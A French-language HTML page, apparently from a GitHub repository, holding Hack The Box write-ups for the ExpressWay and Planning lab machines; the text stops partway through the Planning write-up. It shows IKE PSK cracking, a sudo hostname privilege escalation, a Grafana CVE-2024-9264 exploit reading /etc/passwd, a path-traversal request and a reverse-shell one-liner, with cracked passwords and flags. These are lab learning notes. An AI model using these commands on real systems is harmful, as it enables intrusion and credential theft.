-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathwriteups.html
More file actions
1139 lines (908 loc) · 42.3 KB
/
writeups.html
File metadata and controls
1139 lines (908 loc) · 42.3 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<!DOCTYPE html>
<html lang="fr">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<title>Fr3nch4Sec - Writeups CTF</title>
<!-- Marked.js -->
<script src="https://cdn.jsdelivr.net/npm/marked/marked.min.js"></script>
<!-- Highlight.js -->
<link id="highlight-theme" rel="stylesheet"
href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/styles/github-dark.min.css">
<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.9.0/highlight.min.js"></script>
<!-- Inline CSS -->
<style>
:root{
--bg-dark: #071025;
--bg-overlay: rgba(5,8,12,0.55);
--text-dark: #dbefff;
--accent1: #6ef0d3; /* turquoise */
--accent2: #b16bff; /* violet */
--code-bg-dark: #0b1116;
--code-green: #4cffb6;
--code-pink: #ff7ab6;
--bg-light: #e8ecef; /* Gris bleuté doux, moins blanc */
--text-light: #2c3e50; /* Anthracite doux */
--accent1-light: #5dade2; /* Turquoise pastel atténué */
--accent2-light: #bb8fce; /* Violet pastel (moins saturé) */
--code-bg-light: #f1f3f4; /* Gris crème très clair */
--code-blue: #3498db; /* Bleu doux (moins vif) */
}
/* Global */
html,body{height:100%;margin:0;padding:0;font-family:Inter, Arial, sans-serif;background:var(--bg-dark);color:var(--text-dark);}
body{
padding:30px;
box-sizing:border-box;
transition:background .25s,color .25s;
background-image: url('https://images.unsplash.com/photo-1518770660439-4636190af475?q=80&w=1920&auto=format&fit=crop');
background-size:cover;
background-attachment: fixed;
overflow-x: hidden;
}
/* Overlay sombre pour dark mode */
body.dark-mode::before{
content:"";
position:fixed;
inset:0;
background:linear-gradient(180deg, rgba(0,0,0,0.65), rgba(2,6,12,0.85));
z-index:-2;
}
/* Overlay clair pour light mode (ultra-transparent pour voir l'image) */
body.light-mode::before{
content:"";
position:fixed;
inset:0;
background:linear-gradient(180deg, rgba(232,236,239,0.2), rgba(245,247,250,0.4)); /* Très transparent : image visible ! */
z-index:-2;
}
/* main container */
main{
position:relative;
z-index:2;
max-width:1100px;
margin:0 auto;
background:linear-gradient(180deg, rgba(255,255,255,0.02), rgba(255,255,255,0.01));
backdrop-filter: blur(2px);
padding:20px;
border-radius:12px;
box-shadow:0 10px 30px rgba(0,0,0,0.5);
}
body.light-mode main {
background: linear-gradient(180deg, rgba(232,236,239,0.6), rgba(245,247,250,0.7)); /* Overlay image visible, moins blanc */
box-shadow: 0 4px 12px rgba(0,0,0,0.08);
}
header h1{margin:0 0 6px;font-size:2rem;color:var(--accent1)}
header p{margin:0 0 16px;color:rgba(219,239,255,0.9)}
/* Theme toggle */
.theme-toggle{
position:fixed;right:18px;top:18px;padding:8px 12px;border-radius:10px;border:0;cursor:pointer;
background:linear-gradient(90deg,#1e90ff,#8a2be2);color:#fff;font-weight:700;box-shadow:0 6px 18px rgba(0,0,0,0.35);
z-index:9999;
}
body.light-mode .theme-toggle {
background: linear-gradient(90deg, #5dade2, #bb8fce); /* Accents pastel pour bouton */
}
/* Sections & cards */
.platform-section{
margin-bottom:26px;padding:14px;border-radius:10px;background:var(--bg-overlay);
border:1px solid rgba(255,255,255,0.03);
}
body.light-mode .platform-section {
background: #f5f7fa; /* Crème grisâtre doux, moins blanc */
border: 1px solid #e9ecef;
}
.platform-section h2{margin:0 0 12px;color:var(--accent2);text-shadow:0 2px 6px rgba(177,107,255,0.06)}
body.light-mode .platform-section h2 {
color: var(--accent1-light); /* Turquoise pastel */
}
.writeup-item{
margin:12px 0;padding:12px;border-radius:10px;
background:linear-gradient(180deg, rgba(255,255,255,0.02), rgba(255,255,255,0.01));
border:1px solid rgba(255,255,255,0.03);
}
body.light-mode .writeup-item {
background: #f5f7fa;
border: 1px solid #e9ecef;
}
.writeup-item h3{margin:0;font-size:1.05rem}
.clickable{
cursor:pointer;
display:flex;
align-items:center;
justify-content:space-between;
padding-right:28px;
user-select:none;
pointer-events:auto;
}
body.light-mode .clickable .title-text {
color: var(--accent2-light); /* Violet pastel */
}
.clickable .title-text{color:var(--accent1);font-weight:600}
.clickable::after{content:'+';font-size:1.25rem;font-weight:700;position:absolute;right:16px;top:50%;transform:translateY(-50%);transition:transform .2s}
.clickable.open::after{content:'−';transform:translateY(-50%) rotate(180deg)}
/* Accordion content */
.writeup-content{
height:0;
overflow:hidden;
padding:0 8px;
transition:height 0.45s ease, padding 0.25s ease;
will-change: height;
}
.writeup-content.open{
padding:12px 8px;
height: auto;
}
body.light-mode .writeup-content {
background: #f5f7fa; /* Crème pour contenu */
border: 1px solid #e9ecef;
}
/* Markdown styling */
.writeup-content h1,.writeup-content h2,.writeup-content h3{color:var(--accent2);margin-top:8px}
.writeup-content p{margin:8px 0;color:inherit}
.writeup-content ul{margin:8px 0 8px 20px}
.writeup-content pre{
background:var(--code-bg-dark);
color:var(--code-green);
padding:12px;border-radius:8px;overflow:auto;margin:10px 0;
white-space:pre-wrap;font-family:"Hack", monospace;font-size:0.95rem;border:1px solid rgba(0,255,182,0.06);
max-height: none;
}
body.light-mode .writeup-content pre {
background: var(--code-bg-light); /* Gris crème */
color: var(--code-blue); /* Bleu doux */
border: 1px solid #dee2e6;
}
.writeup-content code{background:rgba(255,255,255,0.03);padding:2px 6px;border-radius:4px}
body.light-mode .writeup-content code {
background: rgba(233,236,239,0.5); /* Gris crème pour inline code */
}
.writeup-content table{width:100%;table-layout:auto;border-collapse:collapse;margin:10px 0}
.writeup-content th,.writeup-content td{padding:6px 8px;text-align:left;border-bottom:1px solid rgba(255,255,255,0.03);word-break:break-word}
.writeup-content img{max-width:100%;height:auto;border-radius:8px;margin:10px 0;display:block}
/* Light mode overrides - COULEURS ADOUCIES */
body.light-mode {
background: var(--bg-light); /* Gris bleuté doux */
color: var(--text-light);
}
/* Responsive */
@media (max-width:700px){
body{padding:18px}
.theme-toggle{right:12px;top:12px;padding:6px 10px}
header h1{font-size:1.4rem}
.writeup-item { margin-bottom: 25px; }
}
</style>
</head>
<body>
<!-- Theme toggle -->
<button id="theme-toggle" class="theme-toggle" aria-label="Basculer thème">
<span class="theme-icon">🌙</span>
</button>
<main>
<header>
<h1>📂 Writeups CTF</h1>
<p>Voici mes writeups organisés par plateforme :</p>
</header>
<div id="writeupList">
<!-- HTB -->
<section class="platform-section">
<h2>Hack The Box</h2>
<article class="writeup-item">
<h3 class="clickable"><span class="title-text">ExpressWay - Easy</span></h3>
<div class="writeup-content" aria-hidden="true">
<script type="text/markdown">
# Reconnaissance
## Scan TCP
```bash
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -O 10.10.11.87
Starting Nmap 7.95 ( [https://nmap.org](https://nmap.org/) ) at 2025-10-11 17:47 EDT
Nmap scan report for 10.10.11.87
Host is up (0.093s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at [https://nmap.org/submit/](https://nmap.org/submit/) .
Nmap done: 1 IP address (1 host up) scanned in 8.11 seconds
```
### Scan UDP
```bash
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -sU -sV -T3 --top-ports 25 10.10.11.87
Starting Nmap 7.95 ( [https://nmap.org](https://nmap.org/) ) at 2025-10-11 17:42 EDT
Nmap scan report for 10.10.11.87
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp open tftp Netkit tftpd or atftpd
111/udp closed rpcbind
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp open isakmp?
514/udp closed syslog
520/udp closed route
631/udp closed ipp
998/udp closed puparp
1434/udp closed ms-sql-m
1701/udp closed L2TP
1900/udp closed upnp
4500/udp open|filtered nat-t-ike
5353/udp closed zeroconf
49152/udp closed unknown
49154/udp closed unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at [https://nmap.org/cgi-bin/submit.cgi?new-service](https://nmap.org/cgi-bin/submit.cgi?new-service) :
SF-Port500-UDP:V=7.95%I=7%D=10/11%Time=68EACF88%P=x86_64-pc-linux-gnu%r(IK
SF:E_MAIN_MODE,70,"\0\x11\"3DUfw\x12\xa0F3\xfaf\x1d\x8b\x01\x10\x02\0\0\0\
SF:0\0\0\0\0p\r\0\x004\0\0\0\x01\0\0\0\x01\0\0\0\(\x01\x01\0\x01\0\0\0\x20
SF:\x01\x01\0\0\x80\x01\0\x05\x80\x02\0\x02\x80\x04\0\x02\x80\x03\0\x01\x8
SF:0\x0b\0\x01\x80\x0c\0\x01\r\0\0\x0c\t\0&\x89\xdf\xd6\xb7\x12\0\0\0\x14\
SF:xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\0")%r(IPSEC_START,9C,"1
SF:'\xfc\xb08\x10\x9e\x89\xb1\xf5\xb9\x95\xe2\xf2\xfd\xa4\x01\x10\x02\0\0\
SF:0\0\0\0\0\0\x9c\r\0\x004\0\0\0\x01\0\0\0\x01\0\0\0\(\x01\x01\0\x01\0\0\
SF:0\x20\x01\x01\0\0\x80\x01\0\x05\x80\x02\0\x02\x80\x04\0\x02\x80\x03\0\x
SF:03\x80\x0b\0\x01\x80\x0c\x0e\x10\r\0\0\x0c\t\0&\x89\xdf\xd6\xb7\x12\r\0
SF:\0\x14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\0\r\0\0\x18@H\xb
SF:7\xd5n\xbc\xe8\x85%\xe7\xde\x7f\0\xd6\xc2\xd3\x80\0\0\0\0\0\0\x14\x90\x
SF:cb\x80\x91>\xbbin\x08c\x81\xb5\xecB{\x1f");
Service detection performed. Please report any incorrect results at [https://nmap.org/submit/](https://nmap.org/submit/) .
Nmap done: 1 IP address (1 host up) scanned in 143.11 seconds
```
```bash
┌──(kali㉿kali)-[~/udpx]
└─$ ./udpx -t 10.10.11.87
__ ______ ____ _ __
/ / / / __ \\/ __ \\ |/ /
/ / / / / / / /_/ / /
/ /_/ / /_/ / ____/ |
\\____/_____/_/ /_/|_|
v1.0.7, by @nullt3r
2025/10/11 17:45:48 [+] Starting UDP scan on 1 target(s)
2025/10/11 17:46:01 [*] 10.10.11.87:500 (ike)
2025/10/11 17:46:11 [+] Scan completed
```
# Exploitation
J’ai eu du mal à trouver un point faible, à cause des ports, peu commun.
J’ai découvert l’outil *UDPx* **** de [*https://github.com/nullt3r](https://github.com/nullt3r) .* Qui est parfait dans mon cas.
UDPx à attiré mon attention sur le protocole IKE du port 500. Lequel est utilisé pour les échanges de clés de cryptage.
Donc j’ai farfouillé et utilisé l’outil Kali, *ike-scan.*
Qui m’a permis d’obtenir un handshake.
```bash
┌──(kali㉿kali)-[~]
└─$ ike-scan -M -v 10.10.11.87
DEBUG: pkt len=336 bytes, bandwidth=56000 bps, int=52000 us
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Main Mode Handshake returned
HDR=(CKY-R=36cd9c4ac1578c6a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.120 seconds (8.33 hosts/sec). 1 returned handshake; 0 returned notify
┌──(kali㉿kali)-[~]
└─$ ike-scan -A --pskcrack 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87 Aggressive Mode Handshake returned HDR=(CKY-R=ae17a846e87c0adf) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
d075f9b37866807d3a29afe19076d12e1396d527edf3f034bcf3b5a39963fc04fbef14d197b9280e669ed581249a477ab7e6074a0bbe69662c027c3caf3f8a2b575da257fb8d2886274a8632a1e970ebdeebe5f9059b2816f0f9dff67a9bd266b488a0afe2b653445cf4eff46865eb79284edcd73ac1516a58bd185ad41480ee:f2b93dbd71df0d2296fe63d734e87e82c9eb78614f04c6dbc35788e6418181775d8146ab308ad9a2bb5e28c436314756ad4a51b8b01a91a5f0a92c88cf5ac6739158b3d58610c5b9ba21f8e8ddda233928920470cc55655c7ee1d4ca840720c9c68a45ae2c3d1138129a18679266e9268c20585183599afdf7e2186b52aeacf4:ae17a846e87c0adf:42529b36e51a1779:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:d4cb080e953462da3b4feb77129d881e8d152aaf:3330922eacabf780a0aeb61b2299ebfa47ff72cc96c962cc71715106ce3b3d13:6145867692f60a5810bee530b281fd79a59dccb1
Ending ike-scan 1.9.6: 1 hosts scanned in 0.197 seconds (5.08 hosts/sec). 1 returned handshake; 0 returned notify
```
## Hash decrypt
J’ai déchiffrer le handshake en 5 secondes avec la liste rockyou et le tool kali, psk-crack.
```bash
┌──(kali㉿kali)-[~/Documents/htb/ExpressWay]
└─$ ls
expressway.txt psk.hash
┌──(kali㉿kali)-[~/Documents/htb/ExpressWay]
└─$ psk-crack -d /usr/share/wordlists/rockyou.txt psk.hash
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash 6145867692f60a5810bee530b281fd79a59dccb1
Ending psk-crack: 8045040 iterations in 5.034 seconds (1598196.84 iterations/sec)
```
---
## Connexion SSH
J’ai utilisé le port ssh, trouvé lors du scan TCP. Pour m’y connecté avec le password déchiffré.
```bash
┌──(kali㉿kali)-[~/Documents/htb/ExpressWay]
└─$ ssh [ike@10.10.11.87ike@10.10.11.87](mailto:ike@10.10.11.87)'s password:
Last login: Sat Oct 11 22:37:08 BST 2025 from 10.10.14.171 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 11 23:05:54 2025 from 10.10.15.91
ike@expressway:~$ whoami
ike
ike@expressway:~$ ls
user.txt
ike@expressway:~$ cat user.txt
1fd0d790c3eefdc4c1efbee72da82203
```
Le user flag était juste sous mon nez.
# Élévation de privilèges
Le user ike est dans le groupe ike mais aussi dans proxy. Le proxy group donne accès à access.log
Pour passer root de la box, j’ai cherché au niveau des logs contenus dans Squid.
Dans le fichier log, il y avait [*offramp.expressway.htb](http://offramp.expressway.htb/)* , ce qui est inhabituel comme emplacement, pour une url.
C’était un indice, du fait qu’il fallait s’en servir pour élever les permissions.
```bash
ike@expressway:/$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)
ike@expressway:/$ ls -la /var/log/squid/
total 28
drwxr-xr-x 2 proxy proxy 4096 Sep 16 16:02 .
drwxr-xr-x 12 root root 4096 Oct 11 23:03 ..
-rw-r----- 1 proxy proxy 4778 Jul 23 01:19 access.log.1
-rw-r----- 1 proxy proxy 20 Jul 22 19:32 access.log.2.gz
-rw-r----- 1 proxy proxy 2192 Jul 23 01:47 cache.log.1
-rw-r----- 1 proxy proxy 941 Jul 23 01:47 cache.log.2.gz
ike@expressway:/$ cat /var/log/squid/access.log.1 | grep offramp
1753229688.902 0 192.168.68.50 TCP_DENIED/403 3807 GET [http://offramp.expressway.htb](http://offramp.expressway.htb/) - HIER_NONE/- text/html
ike@expressway:/$ /usr/local/bin/sudo -h offramp.expressway.htb /bin/bash
root@expressway:/# ls
bin etc initrd.img.old lost+found opt run sys var
boot home lib media proc sbin tmp vmlinuz
dev initrd.img lib64 mnt root srv usr vmlinuz.old
root@expressway:/# cd root
root@expressway:~# ls
root.txt
root@expressway:~# cat root.txt
db8751f4711f0984ae2788fc5d5a7275
```
---
Fin de la Box ExpressWay.
## Conclusion
Ce CTF a été assez rapide, une fois que j’ai trouvé la bonne façon de scanner la box.
J’ai découvert le protocole IKE, ainsi que les outils de pentest, pour dialoguer avec.
Pour la partie privilège, je n’ai pas innové mais utilisé les techniques d’autres personnes. Car j’ai pas encore les connaissances suffisantes pour comprendre le coeur de linux. Bien que j’utilises différents OS linux comme Ubuntu, Kali, Manjaro depuis quelques années.
Il y a un océan de connaissances à découvrir. Et je n’ai qu’un bateau à voile.
[HTB Planning](https://www.notion.so/HTB-Planning-2997f9ac796880b7a721c7cd4b1bc571?pvs=21)
</script>
</div>
</article>
<article class="writeup-item">
<h3 class="clickable"><span class="title-text">Planning - Easy</span></h3>
<div class="writeup-content" aria-hidden="true">
<script type="text/markdown">
# HTB - Planning - Easy
# Infos
Le CTF fourni des identifiants pour commencer:
id: admin
pwd: 0D5oT70Fq13EvB5r
# Reconnaissance
```bash
nmap -p- -sC -sV -O 10.10.11.68
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
|_ 256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
```
## Scan des vulnérabilités
```bash
nuclei -target http://planning.htb
[missing-sri] [http] [info] http://planning.htb ["https://code.jquery.com/jquery-3.4.1.min.js","https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.bundle.min.js"]
[external-service-interaction] [http] [info] http://planning.htb
[waf-detect:nginxgeneric] [http] [info] http://planning.htb
[ssh-sha1-hmac-algo] [javascript] [info] planning.htb:22
[ssh-server-enumeration] [javascript] [info] planning.htb:22 ["SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.11"]
[ssh-password-auth] [javascript] [info] planning.htb:22
[ssh-auth-methods] [javascript] [info] planning.htb:22 ["["publickey","password"]"]
[openssh-detect] [tcp] [info] planning.htb:22 ["SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.11"]
[form-detection] [http] [info] http://planning.htb
[nginx-version] [http] [info] http://planning.htb ["nginx/1.24.0"]
[http-missing-security-headers:strict-transport-security] [http] [info] http://planning.htb
[http-missing-security-headers:permissions-policy] [http] [info] http://planning.htb
[http-missing-security-headers:x-frame-options] [http] [info] http://planning.htb
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://planning.htb
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://planning.htb
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://planning.htb
[http-missing-security-headers:content-security-policy] [http] [info] http://planning.htb
[http-missing-security-headers:x-content-type-options] [http] [info] http://planning.htb
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://planning.htb
[http-missing-security-headers:referrer-policy] [http] [info] http://planning.htb
[http-missing-security-headers:clear-site-data] [http] [info] http://planning.htb
[tech-detect:nginx] [http] [info] http://planning.htb
[tech-detect:owl-carousel] [http] [info] http://planning.htb
[caa-fingerprint] [dns] [info] planning.htb
[INF] Scan completed in 1m. 24 matches found.
```
## Fuzzing
```bash
$ ffuf -c -w namelist.txt -H 'Host: FUZZ.planning.htb' -u http://10.10.11.68 -fc 301
grafana [Status: 302, Size: 29, Words: 2, Lines: 3, Duration: 93ms]
```
```bash
$ curl --path-as-is -i "http://grafana.planning.htb/public/build/datasource/../../../../../../../../etc/passwd"
```
```bash
$ curl -i "http://grafana.planning.htb/"
HTTP/1.1 302 Found
Server: nginx/1.24.0 (Ubuntu)
Date: Sun, 21 Sep 2025 22:11:14 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 29
Connection: keep-alive
Cache-Control: no-store
Location: /login
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-Xss-Protection: 1; mode=block
<a href="/login">Found</a>.
```
Cette commande permet de trouver la version de Grafana.
```bash
$ curl -s "http://grafana.planning.htb/login" | grep -i version
"version":"11.0.0" et "Grafana v11.0.0 (83b9528bce)"
```
```bash
$ gobuster dir -u http://grafana.planning.htb -w directory-list-2.3-medium.txt -x php,js,txt --exclude-length 29
/login (Status: 200) [Size: 38241]
/signup (Status: 200) [Size: 38241]
/public (Status: 302) [Size: 31] [--> /public/]
/admin (Status: 302) [Size: 24] [--> /]
/plugins (Status: 302) [Size: 24] [--> /]
/api.php (Status: 401) [Size: 102]
/api.js (Status: 401) [Size: 102]
/api (Status: 401) [Size: 102]
/api.txt (Status: 401) [Size: 102]
/robots.txt (Status: 200) [Size: 26]
```
# Exploitation
J'ai trouvé une faille pour Grafana version 11.
Ce repository fourni un exploit Python pour la https://github.com/nollium/CVE-2024-9264.git
Donc je l’ai lancé avec les creds initiaux, pour accéder à la base de données.
```bash
python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -f /etc/passwd http://grafana.planning.htb:80
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Reading file: /etc/passwd
[+] Successfully ran duckdb query:
[+] SELECT content FROM read_blob('/etc/passwd'):
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
grafana:x:472:0::/home/grafana:/usr/sbin/nologin
```
```bash
┌──(.venv)─(kali㉿kali)-[~/Documents/htb/Planning/CVE-2024-9264]
└─$ python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c "cat /home/grafana/user.txt" http://grafana.planning.htb
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Executing command: cat /home/grafana/user.txt
[-] Unexpected response format:
[-] {
"results": {
"B": {
"error": "exit status 1IO Error: Pipe process exited with non-zero exit
code=\"1\": cat /home/grafana/user.txt >/tmp/grafana_cmd_output 2>&1 |\n",
"errorSource": "",
"status": 500,
"frames": []
}
}
}
[+] Successfully ran duckdb query:
[+] SELECT content FROM read_blob('/tmp/grafana_cmd_output'):
cat: /home/grafana/user.txt: No such file or directory
┌──(.venv)─(kali㉿kali)-[~/Documents/htb/Planning/CVE-2024-9264]
└─$ python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c "bash -i >& /dev/tcp/10.10.14.XX/4444 0>&1" http://grafana.planning.htb
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Executing command: bash -i >& /dev/tcp/10.10.14.XX/4444 0>&1
[-] Unexpected response format:
[-] {
"results": {
"B": {
"error": "exit status 1sh: 1: Syntax error: Bad fd number\nIO Error: Pipe process
exited with non-zero exit code=\"2\": bash -i >& /dev/tcp/10.10.14.XX/4444 0>&1
>/tmp/grafana_cmd_output 2>&1 |\n",
"errorSource": "",
"status": 500,
"frames": []
}
}
}
[+] Successfully ran duckdb query:
[+] SELECT content FROM read_blob('/tmp/grafana_cmd_output'):
cat: /home/grafana/user.txt: No such file or directory
```
```bash
python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -f /home/grafana/flag.txt http://grafana.planning.htb
[+] Logged in as admin:0D5oT70Fq13EvB5r
[+] Reading file: /home/grafana/flag.txt
[-] File not found
┌──(.venv)─(kali㉿kali)-[~/Documents/htb/Planning/CVE-2024-9264]
└─$ python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -f /home/grafana/pass.txt http://grafana.planning.htb
[+] Logged in as admin:0D5oT70Fq13EvB5r
